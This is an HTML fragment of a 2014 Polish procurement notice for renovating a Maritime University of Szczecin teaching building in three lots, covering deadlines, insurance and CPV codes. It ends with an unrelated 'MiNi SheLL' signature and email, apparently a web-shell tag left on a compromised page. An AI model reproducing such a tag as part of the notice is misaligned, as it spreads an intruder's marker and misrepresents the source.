<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zamowienia-publiczne.am.szczecin.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Morska w Szczecinie, Dział Inwestycji i Rozwoju, ul. Wały Chrobrego 1-2, 70-500 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2014 godzina 10:30, miejsce: Akademia Morska w Szczecinie, Kancelaria pok. 73 a, ul. Wały Chrobrego 1-2, 70-500 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Termin wykonania zamówienia:
1.1.	Zadanie nr 1
a) roboty budowlane: w ciągu 130 dni kalendarzowych od dnia przekazania frontu robót. Przekazanie frontu robót Wykonawcy przez Zamawiającego nastąpi niezwłocznie po podpisaniu umowy. 
b) Konserwacja zamontowanych instalacji i urządzeń wentylacji i klimatyzacji przez okres 36 miesięcy od dnia odbioru końcowego robót bez zastrzeżeń do czasu upływu gwarancji).
c) Konserwacja systemów: sygnalizacji włamania i napadu (SWiN), telewizji przemysłowej CCTV przez okres 36 miesięcy od odbioru końcowego robót bez zastrzeżeń do czasu upływu gwarancji.
1.2.	Zadanie nr 2:
w ciągu 60 dni kalendarzowych od dnia przekazania frontu robót. Przekazanie frontu robót Wykonawcy przez Zamawiającego nastąpi niezwłocznie po podpisaniu umowy.
1.3.	Zadanie nr 3:
w ciągu 60 dni kalendarzowych od dnia przekazania frontu robót. (przewidywany termin przekazania frontu robót - do dwóch tygodni po podpisaniu umowy). 
2. Otwarcie ofert nastąpi 11.07.2014 r. w siedzibie Zamawiającego w Dziale Inwestycji i Rozwoju o godz. 11.00. Wszelkie zmiany terminów dokonane przez Zamawiającego do czasu składania ofert wymagają od Wykonawcy aktualizacji zapisów niniejszego rozdziału.
3. Przed podpisaniem umowy, w terminie wyznaczonym przez Zamawiającego, Wykonawca przedłoży Zamawiającemu ważną polisę OC Wykonawcy na cały okres realizacji zamówienia: 
a)  Zadanie nr 1 - Przedkładana polisa musi potwierdzać ubezpieczenie Wykonawcy z tytułu odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie prowadzonej działalności gospodarczej na sumę nie mniejszą, niż 1 500 000,00 zł (słownie: dwa miliony złotych 00/100), w tym limit dla jednego zdarzenia (wypadku) nie mniejszy, niż 2 000 000,00 zł (słownie: dwa miliony złotych 00/100) z zastrzeżeniem, że udział własny (franszyza) w szkodzie nie większy niż 1 000,00zł (jeden tysiąc złotych).
b)  Zadanie nr 2 - Przedkładana polisa musi potwierdzać ubezpieczenie Wykonawcy z tytułu odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie prowadzonej działalności gospodarczej na sumę nie mniejszą, niż 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100), w tym limit dla jednego zdarzenia (wypadku) nie mniejszy, niż 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100) z zastrzeżeniem, że udział własny (franszyza) w szkodzie nie większy niż 1 000,00 zł (jeden tysiąc złotych).
c)  Zadanie nr 3 - Przedkładana polisa musi potwierdzać ubezpieczenie Wykonawcy z tytułu odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie prowadzonej działalności gospodarczej na sumę nie mniejszą, niż 300 000,00 zł (słownie: trzysta tysięcy złotych 00/100), w tym limit dla jednego zdarzenia (wypadku) nie mniejszy, niż 300 000,00 zł (słownie: trzysta tysięcy złotych 00/100) z zastrzeżeniem, że udział własny (franszyza) w szkodzie nie większy niż 1 000,00 zł (jeden tysiąc złotych).
4. Przed podpisaniem umowy, w terminie wyznaczonym przez Zamawiającego, Wykonawca przedłoży Harmonogram Realizacji Robót uwzględniający wymogi Zamawiającego, co do terminów i zakresu wykonywania robót.
5. Wykonawca zobowiązuje się do wniesienia zabezpieczenia należytego wykonania umowy (najpóźniej w dniu podpisania umowy) w wysokości 10 % ceny ofertowej brutto.
W przypadku nieudzielenia dofinansowania projektu z budżetu Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego  na lata 2007-2013, Zamawiający zastrzega możliwość unieważnienia procedury przetargowej (art. 93 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. PZP z późniejszymi zmianami).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa fragmentu I piętra w budynku Dydaktycznym nr 1 wraz z niezbędną infrastrukturą techniczną oraz konserwacja klimatyzacji, wentylacji, systemów SWiN, CCTV pod potrzeby projektu - Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony Środowiska;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia są między innymi:
1.1. roboty budowlane - roboty rozbiórkowe i demontażowe, wyburzenia ścian, przebijanie otworów, roboty malarskie; roboty tynkarskie, wykonanie posadzek, sufity podwieszane, zabudowy z płyt kartonowo - gipsowych, wymiana stolarki okiennej i drzwiowej, rozbiórka pokrycia papowego dachu, obróbek blacharskich, pokrycie dachu papą termozgrzewalną, wykonanie obróbek blacharskich, montaż rur spustowych, rynien, itd.  
1.2. roboty sanitarne - demontaż istniejących instalacji wodnych, kanalizacyjnych, centralnego ogrzewania, roboty w zakresie montażu instalacji wentylacyjnej i klimatyzacyjnej; montażu nowych grzejników płytowych, montażu nowej instalacji  centralnego ogrzewania, wodnych, kanalizacyjnych, wykonanie prób szczelności instalacji c.o., itd.
1.3. roboty elektryczne - demontaż istniejących tras i linii kablowych, wykonanie instalacji elektrycznych, ogólnych, gniazdowych, oświetlenia, oświetlenia ewakuacyjnego, prowadzenie tras kablowych, wykonanie WLZ i tablic rozdzielczych, zasilenie centrali wentylacyjnej, klimatyzacyjnej, multimedialnej (światłowód), teleinformatycznej; zasilanie SWiN, badania i pomiary itd.
1.4. instalacje teleinformatyczne - wykonanie tras kablowych, układanie instalacji teleinformatycznej, wyposażenie GPD i lokalnych punktów dostępowych w niezbędne wyposażenie i urządzenia aktywne i pasywne, dostawa i montaż centrali telefonicznej wraz z aparatami telefonicznymi itd.,
1.5. instalacje teletechniczne - wykonanie tras kablowych, prowadzenie instalacji, montaż urządzeń  dla instalacji SWiN, CCTV, itd.
1.6. konserwacja zamontowanych instalacji i urządzeń wentylacji i klimatyzacji przez okres 36 miesięcy od daty odbioru końcowego robót bez zastrzeżeń.
1.7. konserwacja systemów: sygnalizacji włamania i napadu (SWiN), telewizji przemysłowej CCTV przez okres 36 miesięcy od odbioru końcowego robót bez zastrzeżeń.
Szczegółowy opis przedmiotu zamówienia zawierają: 
Specyfikacja Techniczna Wykonania i Odbioru Robót (zał. nr 9-1 ÷ 9-4 do SIWZ), Przedmiary Robót - pomocniczo (zał. nr 10-1 ÷ 10-4 do SIWZ), Projekty wykonawcze (zał. nr 11-1 ÷ 11-5 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.26.20.00-1, 45.31.12.00-2, 45.33.12.00-8, 45.33.11.00-7, 45.33.00.00-9, 45.26.25.00-6, 45.26.13.00-7, 45.41.00.00-4, 45.43.00.00-0, 45.42.11.00-5, 45.44.21.00-8, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 130.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja toalet w budynku Dydaktycznym nr 1 pod potrzeby projektu -Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony Środowiska;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia zawierają: 
Specyfikacja Techniczna Wykonania i Odbioru Robót (zał. nr 9-6 ÷ 9-8 do SIWZ), Przedmiary Robót - pomocniczo (zał. nr 10-6 ÷ 10-8 do SIWZ), Projekty wykonawcze (zał. nr 11-6 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.43.00.00-0, 45.42.11.00-5, 45.44.21.00-8, 45.31.12.00-2, 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja dachu budynku Dydaktycznego nr 1 pod potrzeby projektu -Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony Środowiska;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia zawierają: 
Specyfikacja Techniczna Wykonania i Odbioru Robót (zał. nr 9-5 do SIWZ), Przedmiary Robót - pomocniczo (zał. nr 10-5 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.10-6, 45.26.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com